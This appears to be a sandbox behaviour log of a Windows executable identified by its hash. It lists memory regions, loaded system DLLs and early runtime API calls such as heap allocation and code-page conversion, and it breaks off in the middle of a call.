"\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000a.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000a.db") Region: id = 912 start_va = 0x2780000 end_va = 0x2780fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002780000" filename = "" Region: id = 913 start_va = 0x3020000 end_va = 0x3120fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003020000" filename = "" Region: id = 914 start_va = 0x3020000 end_va = 0x3120fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003020000" filename = "" Region: id = 915 start_va = 0x3020000 end_va = 0x3120fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003020000" filename = "" Region: id = 916 start_va = 0x2770000 end_va = 0x2773fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 917 start_va = 0x2900000 end_va = 0x292ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000015.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000015.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000015.db") Region: id = 918 start_va = 0x2790000 end_va = 0x2793fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 919 start_va = 0x2d90000 end_va = 0x2df5fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 920 start_va = 0x2e00000 end_va = 0x2e3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e00000" filename = "" Region: id = 921 start_va = 0x28a0000 end_va = 0x28adfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\propsys.dll.mui") Region: id = 922 start_va = 0x759d0000 end_va = 0x75b6cfff monitored = 0 entry_point = 0x759d17e7 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 923 start_va = 0x758a0000 end_va = 0x758c6fff monitored = 0 entry_point = 0x758a58b9 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 924 start_va = 0x75b70000 end_va = 0x75b81fff monitored = 0 entry_point = 0x75b71441 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 925 start_va = 0x28b0000 end_va = 0x28bcfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\setupapi.dll.mui") Thread: id = 2 os_tid = 0xf24 [0078.496] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0x9bf0c2a0, dwHighDateTime=0x1d8a8ba)) [0078.496] GetCurrentThreadId () returned 0xf24 [0078.496] GetCurrentProcessId () returned 0xf20 [0078.496] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=1629770985131) returned 1 [0078.545] GetStartupInfoW (in: lpStartupInfo=0x18ff08 | out: lpStartupInfo=0x18ff08*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x76f1fd35, hStdError=0x76f87daf)) [0078.586] GetProcessHeap () returned 0x5d0000 [0078.766] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x752b0000 [0078.766] GetProcAddress (hModule=0x752b0000, lpProcName="FlsAlloc") returned 0x752c4ee3 [0078.766] GetProcAddress (hModule=0x752b0000, lpProcName="FlsFree") returned 0x752c354f [0078.767] GetProcAddress (hModule=0x752b0000, lpProcName="FlsGetValue") returned 0x752c1252 [0078.767] GetProcAddress (hModule=0x752b0000, lpProcName="FlsSetValue") returned 0x752c41c0 [0078.767] GetProcAddress (hModule=0x752b0000, lpProcName="InitializeCriticalSectionEx") returned 0x752c4ce0 [0078.767] GetProcAddress (hModule=0x752b0000, lpProcName="CreateEventExW") returned 0x753446ab [0078.767] GetProcAddress (hModule=0x752b0000, lpProcName="CreateSemaphoreExW") returned 0x75344735 [0078.767] GetProcAddress (hModule=0x752b0000, lpProcName="SetThreadStackGuarantee") returned 0x752cd2d7 [0078.767] GetProcAddress (hModule=0x752b0000, lpProcName="CreateThreadpoolTimer") returned 0x752dee4e [0078.767] GetProcAddress (hModule=0x752b0000, lpProcName="SetThreadpoolTimer") returned 0x76f4441c [0078.768] GetProcAddress (hModule=0x752b0000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x76f6c50e [0078.768] GetProcAddress (hModule=0x752b0000, lpProcName="CloseThreadpoolTimer") returned 0x76f6c381 [0078.768] GetProcAddress (hModule=0x752b0000, lpProcName="CreateThreadpoolWait") returned 0x752df058 [0078.768] GetProcAddress (hModule=0x752b0000, lpProcName="SetThreadpoolWait") returned 0x76f505d7 [0078.768] GetProcAddress (hModule=0x752b0000, lpProcName="CloseThreadpoolWait") returned 0x76f6ca24 [0078.768] GetProcAddress (hModule=0x752b0000, lpProcName="FlushProcessWriteBuffers") returned 0x76f20b8c [0078.768] GetProcAddress (hModule=0x752b0000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x76fdfde8 [0078.768] GetProcAddress (hModule=0x752b0000, lpProcName="GetCurrentProcessorNumber") returned 0x76f71e1d [0078.769] GetProcAddress (hModule=0x752b0000, lpProcName="GetLogicalProcessorInformation") returned 0x75344d01 [0078.769] GetProcAddress (hModule=0x752b0000, lpProcName="CreateSymbolicLinkW") returned 0x7533d181 [0078.769] GetProcAddress (hModule=0x752b0000, lpProcName="SetDefaultDllDirectories") returned 0x753d208a [0078.769] GetProcAddress (hModule=0x752b0000, lpProcName="EnumSystemLocalesEx") returned 0x753447ef [0078.769] GetProcAddress (hModule=0x752b0000, lpProcName="CompareStringEx") returned 0x75344c51 [0078.769] GetProcAddress (hModule=0x752b0000, lpProcName="GetDateFormatEx") returned 0x75356c26 [0078.769] GetProcAddress (hModule=0x752b0000, lpProcName="GetLocaleInfoEx") returned 0x75344cf1 [0078.769] GetProcAddress (hModule=0x752b0000, lpProcName="GetTimeFormatEx") returned 0x75356ba1 [0078.770] GetProcAddress (hModule=0x752b0000, lpProcName="GetUserDefaultLocaleName") returned 0x75344d61 [0078.770] GetProcAddress (hModule=0x752b0000, lpProcName="IsValidLocaleName") returned 0x75344d81 [0078.770] GetProcAddress (hModule=0x752b0000, lpProcName="LCMapStringEx") returned 0x75344d91 [0078.770] GetProcAddress (hModule=0x752b0000, lpProcName="GetCurrentPackageId") returned 0x0 [0078.770] GetProcAddress (hModule=0x752b0000, lpProcName="GetTickCount64") returned 0x752deeb0 [0078.770] GetProcAddress (hModule=0x752b0000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0078.770] GetProcAddress (hModule=0x752b0000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0078.771] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x3bc) returned 0x5ef1c8 [0078.771] GetCurrentThreadId () returned 0xf24 [0078.807] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x18) returned 0x5e19a0 [0078.807] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x800) returned 0x5ef590 [0078.807] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x425128, hStdOutput=0xefc3c572, hStdError=0x0)) [0078.810] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0078.810] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0078.810] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0078.810] GetCommandLineW () returned="\"C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe\" " [0078.810] GetEnvironmentStringsW () returned 0x5efd98* [0078.811] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xb0e) returned 0x5f08b0 [0078.848] FreeEnvironmentStringsW (penv=0x5efd98) returned 1 [0078.883] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x511130, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe")) returned 0x5f [0078.883] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc8) returned 0x5efd98 [0078.883] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x98) returned 0x5efe68 [0078.883] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x3e) returned 0x5e23e8 [0078.884] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x56) returned 0x5eff08 [0078.884] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x6e) returned 0x5eff68 [0078.884] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x78) returned 0x5dfb38 [0078.884] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x62) returned 0x5effe0 [0078.884] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x30) returned 0x5eb278 [0078.884] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x48) returned 0x5e6d90 [0078.884] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x28) returned 0x5eac70 [0078.884] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x1a) returned 0x5eea80 [0078.884] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x34) returned 0x5e19c0 [0078.884] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x5c) returned 0x5f0050 [0078.884] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x32) returned 0x5f00b8 [0078.884] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x2e) returned 0x5eb2b0 [0078.884] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x1c) returned 0x5eeaa8 [0078.884] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x12a) returned 0x5f00f8 [0078.884] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x7c) returned 0x5f0230 [0078.884] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x36) returned 0x5f02b8 [0078.884] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x3a) returned 0x5e2430 [0078.885] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x90) returned 0x5f02f8 [0078.885] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x24) returned 0x5eaca0 [0078.885] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x30) returned 0x5eb2e8 [0078.885] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x36) returned 0x5f0390 [0078.885] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x48) returned 0x5e6de0 [0078.885] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x52) returned 0x5f03d0 [0078.885] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x3c) returned 0x5e2478 [0078.885] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xd6) returned 0x5f0430 [0078.885] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x2e) returned 0x5eb320 [0078.886] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x1e) returned 0x5eead0 [0078.886] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x2c) returned 0x5eb358 [0078.886] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x54) returned 0x5f0510 [0078.886] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x52) returned 0x5f0570 [0078.886] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x2c) returned 0x5eb390 [0078.886] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x26) returned 0x5eacd0 [0078.886] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x3e) returned 0x5e24c0 [0078.886] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x24) returned 0x5ead00 [0078.886] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x30) returned 0x5eb3c8 [0078.886] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x8c) returned 0x5f05d0 [0078.886] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5f08b0 | out: hHeap=0x5d0000) returned 1 [0079.095] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x800) returned 0x5f0668 [0079.123] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x80) returned 0x5f0e70 [0079.123] GetLastError () returned 0x0 [0079.123] SetLastError (dwErrCode=0x0) [0079.124] GetLastError () returned 0x0 [0079.124] SetLastError (dwErrCode=0x0) [0079.124] GetLastError () returned 0x0 [0079.124] SetLastError (dwErrCode=0x0) [0079.124] GetACP () returned 0x4e4 [0079.124] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x220) returned 0x5f0ef8 [0079.124] GetLastError () returned 0x0 [0079.124] SetLastError (dwErrCode=0x0) [0079.124] IsValidCodePage (CodePage=0x4e4) returned 1 [0079.124] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fecc | out: lpCPInfo=0x18fecc) returned 1 [0079.146] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f994 | out: lpCPInfo=0x18f994) returned 1 [0079.154] GetLastError () returned 0x0 [0079.154] SetLastError (dwErrCode=0x0) [0079.154] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0079.161] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f718, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0079.161] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9a8 | out: lpCharType=0x18f9a8) returned 1 [0079.161] GetLastError () returned 0x0 [0079.161] SetLastError (dwErrCode=0x0) [0079.161] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0079.161] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0079.177] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0079.177] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0079.177] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fca8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿâÄÃïäþ\x18", lpUsedDefaultChar=0x0) returned 256 [0079.187] GetLastError () returned 0x0 [0079.187] SetLastError (dwErrCode=0x0) [0079.187] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0079.187] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0079.187] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0079.187] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0079.187] WideCharToMultiByte (in: CodePage=0x4e4, 